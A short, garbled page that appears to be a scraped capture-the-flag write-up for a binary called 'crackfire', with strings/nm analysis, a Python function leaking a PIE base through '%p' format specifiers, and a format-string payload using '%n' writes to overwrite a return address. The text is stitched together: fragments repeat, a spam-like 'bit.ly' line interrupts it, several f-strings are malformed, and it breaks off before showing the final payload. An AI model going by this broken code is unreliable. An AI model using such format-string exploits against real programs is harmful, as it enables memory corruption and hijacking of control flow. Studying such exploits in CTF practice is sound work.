Bit.ly Crackfire | Https-

Access granted! Flag: FLAG... The goal is to get the flag brute‑forcing the secret. 3. Static analysis 3.1. strings & nm strings crackfire | head # … many strings, including "Access granted!", "Invalid code!" nm -D crackfire | grep -i win # 0000000000401240 T win The function win prints the flag. The usual pattern in these CTF binaries is:

crackfire crackfire.c (source – optional, not always present) Make the binary executable: https- bit.ly crackfire

[payload] = <addr_of_ret> <addr_of_ret+4> <format string> We must pad the number of bytes printed so that %n writes the correct value. Access granted

def get_base(p): """Leak a known symbol (e.g., _start) to compute PIE base.""" # _start is at offset 0x4000 from base (found via readelf) leak = leak_address(p, "%p %p %p %p %p %p") # The second pointer (index 1) is usually _start in this binary # Adjust as needed by inspecting the output. # For illustration we assume leak is the PIE base directly. base = leak - elf.sym['_start'] log.success(f"PIE base: hex(base)") return base The usual pattern in these CTF binaries is:

payload = flat([ret_addr, ret_addr+4]) # these become %1$ and %2$ # We need to print 'low' bytes, then write with %3$n payload += f"%lowc%3$n" # write low 4 bytes # Pad to reach high (taking into account already printed bytes) pad = (high - low) % 0x100000000 # wrap‑around handling payload += f"%padc%4$n" The resulting string (hex‑escaped) looks like: